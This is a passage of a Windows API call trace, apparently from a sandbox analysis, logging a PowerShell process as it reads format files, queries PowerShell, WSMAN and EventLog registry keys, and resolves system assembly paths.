nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36e0110*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.558] ReadFile (in: hFile=0x310, lpBuffer=0x36e0110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36e0110*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.558] ReadFile (in: hFile=0x310, lpBuffer=0x36e0110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36e0110*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.558] ReadFile (in: hFile=0x310, lpBuffer=0x36e0110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36e0110*, lpNumberOfBytesRead=0x16d498*=0x8b4, lpOverlapped=0x0) returned 1 [0091.559] ReadFile (in: hFile=0x310, lpBuffer=0x36df52c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36df52c*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.559] ReadFile (in: hFile=0x310, lpBuffer=0x36e0110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x36e0110*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.559] SetErrorMode (uMode=0x1) returned 0x1 [0091.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0091.560] SetErrorMode (uMode=0x1) returned 0x1 [0091.560] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x310) returned 0x0 [0091.560] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0091.560] CoTaskMemAlloc (cb=0x5a) returned 0x30bea0 [0091.560] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30bea0, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0091.560] CoTaskMemFree (pv=0x30bea0) [0091.560] RegCloseKey (hKey=0x310) returned 0x0 [0091.562] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x4c82e929, Data2=0x90a1, Data3=0x457c, Data4=([0]=0x8b, [1]=0xfe, [2]=0x15, [3]=0x6e, [4]=0xdd, [5]=0x62, [6]=0x45, [7]=0x5b))) returned 0x0 [0091.577] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x8a3ffd9b, Data2=0x1cb6, Data3=0x4203, Data4=([0]=0x9c, [1]=0xd9, [2]=0x8b, [3]=0x3b, [4]=0x4a, [5]=0x3, [6]=0xc3, [7]=0x8e))) returned 0x0 [0091.578] SetErrorMode (uMode=0x1) returned 0x1 [0091.578] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0091.578] SetErrorMode (uMode=0x1) returned 0x1 [0091.578] GetFileType (hFile=0x310) returned 0x1 [0091.578] ReadFile (in: hFile=0x310, lpBuffer=0x371def8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x371def8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.579] ReadFile (in: hFile=0x310, lpBuffer=0x371def8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x371def8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.580] ReadFile (in: hFile=0x310, lpBuffer=0x371def8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x371def8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.580] ReadFile (in: hFile=0x310, lpBuffer=0x371def8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x371def8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0091.580] ReadFile (in: hFile=0x310, lpBuffer=0x371def8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x371def8*, lpNumberOfBytesRead=0x16d498*=0xe98, lpOverlapped=0x0) returned 1 [0091.580] ReadFile (in: hFile=0x310, lpBuffer=0x371d4f8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x371d4f8*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.580] ReadFile (in: hFile=0x310, lpBuffer=0x371def8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x371def8*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0091.580] SetErrorMode (uMode=0x1) returned 0x1 [0091.580] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0091.581] SetErrorMode (uMode=0x1) returned 0x1 [0091.581] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x310) returned 0x0 [0091.581] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0091.581] CoTaskMemAlloc (cb=0x5a) returned 0x30bea0 [0091.581] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30bea0, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0091.581] CoTaskMemFree (pv=0x30bea0) [0091.581] RegCloseKey (hKey=0x310) returned 0x0 [0091.582] VirtualQuery (in: lpAddress=0x16bfc0, lpBuffer=0x16ce80, dwLength=0x30 | out: lpBuffer=0x16ce80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.582] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xe5b5a37b, Data2=0xee48, Data3=0x450f, Data4=([0]=0xae, [1]=0x97, [2]=0x61, [3]=0xd5, [4]=0xa5, [5]=0xe1, [6]=0x74, [7]=0xca))) returned 0x0 [0091.582] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xfd76a532, Data2=0x915f, Data3=0x45fd, Data4=([0]=0x80, [1]=0x4f, [2]=0x82, [3]=0x5f, [4]=0x49, [5]=0xb, [6]=0xef, [7]=0xc6))) returned 0x0 [0091.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0091.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0091.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0091.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0091.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0091.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0091.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0091.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0091.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0091.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0091.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0091.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0091.847] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.847] CoTaskMemFree (pv=0x2e4450) [0091.849] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.849] CoTaskMemFree (pv=0x2e4450) [0091.850] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.851] CoTaskMemFree (pv=0x2e4450) [0091.852] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.852] CoTaskMemFree (pv=0x2e4450) [0091.862] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.862] CoTaskMemFree (pv=0x2e4450) [0091.864] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.864] CoTaskMemFree (pv=0x2e4450) [0091.864] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.864] CoTaskMemFree (pv=0x2e4450) [0091.870] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d738 | out: phkResult=0x16d738*=0x310) returned 0x0 [0091.875] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d63c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d638, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d63c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d638*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0091.875] CoTaskMemFree (pv=0x0) [0091.876] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0091.876] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x293930, lpcchValueName=0x16d6e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d6e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0091.876] CoTaskMemFree (pv=0x293930) [0091.876] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0091.877] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x293930, lpcchValueName=0x16d6e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d6e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0091.877] CoTaskMemFree (pv=0x293930) [0091.877] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0091.877] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x293930, lpcchValueName=0x16d6e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d6e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0091.877] CoTaskMemFree (pv=0x293930) [0091.879] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d6cc, lpData=0x0, lpcbData=0x16d6c8*=0x0 | out: lpType=0x16d6cc*=0x1, lpData=0x0, lpcbData=0x16d6c8*=0x8) returned 0x0 [0091.879] CoTaskMemAlloc (cb=0xc) returned 0x1b8328d0 [0091.879] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d69c, lpData=0x1b8328d0, lpcbData=0x16d698*=0x8 | out: lpType=0x16d69c*=0x1, lpData="2.0", lpcbData=0x16d698*=0x8) returned 0x0 [0091.879] CoTaskMemFree (pv=0x1b8328d0) [0091.989] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x314) returned 0x0 [0091.989] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d58c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d588, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d58c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d588*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0091.989] CoTaskMemFree (pv=0x0) [0091.989] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0091.989] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x293930, lpcchValueName=0x16d638, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d638, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0091.989] CoTaskMemFree (pv=0x293930) [0091.989] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0091.989] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x293930, lpcchValueName=0x16d638, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d638, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0091.989] CoTaskMemFree (pv=0x293930) [0091.989] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0091.989] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x293930, lpcchValueName=0x16d638, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d638, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0091.989] CoTaskMemFree (pv=0x293930) [0091.990] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d61c, lpData=0x0, lpcbData=0x16d618*=0x0 | out: lpType=0x16d61c*=0x1, lpData=0x0, lpcbData=0x16d618*=0x8) returned 0x0 [0091.990] CoTaskMemAlloc (cb=0xc) returned 0x1b832730 [0091.990] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d5ec, lpData=0x1b832730, lpcbData=0x16d5e8*=0x8 | out: lpType=0x16d5ec*=0x1, lpData="2.0", lpcbData=0x16d5e8*=0x8) returned 0x0 [0091.990] CoTaskMemFree (pv=0x1b832730) [0091.991] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.991] CoTaskMemFree (pv=0x2e4450) [0091.996] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0091.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.997] CoTaskMemFree (pv=0x2e4450) [0092.020] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6b8 | out: phkResult=0x16d6b8*=0x318) returned 0x0 [0092.022] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d62c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d628, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d62c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d628*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.022] CoTaskMemFree (pv=0x0) [0092.023] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.023] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x293930, lpcchName=0x16d6b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.023] CoTaskMemFree (pv=0x293930) [0092.023] CoTaskMemFree (pv=0x0) [0092.024] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.024] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x293930, lpcchName=0x16d6b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.024] CoTaskMemFree (pv=0x293930) [0092.024] CoTaskMemFree (pv=0x0) [0092.024] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.024] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x293930, lpcchName=0x16d6b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.024] CoTaskMemFree (pv=0x293930) [0092.024] CoTaskMemFree (pv=0x0) [0092.024] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.024] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x293930, lpcchName=0x16d6b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.024] CoTaskMemFree (pv=0x293930) [0092.024] CoTaskMemFree (pv=0x0) [0092.024] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.024] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x293930, lpcchName=0x16d6b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.024] CoTaskMemFree (pv=0x293930) [0092.024] CoTaskMemFree (pv=0x0) [0092.024] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.024] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x293930, lpcchName=0x16d6b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.024] CoTaskMemFree (pv=0x293930) [0092.024] CoTaskMemFree (pv=0x0) [0092.024] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.024] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x293930, lpcchName=0x16d6b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d6b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0092.024] CoTaskMemFree (pv=0x293930) [0092.024] CoTaskMemFree (pv=0x0) [0092.024] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.024] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x293930, lpcchName=0x16d6b8, 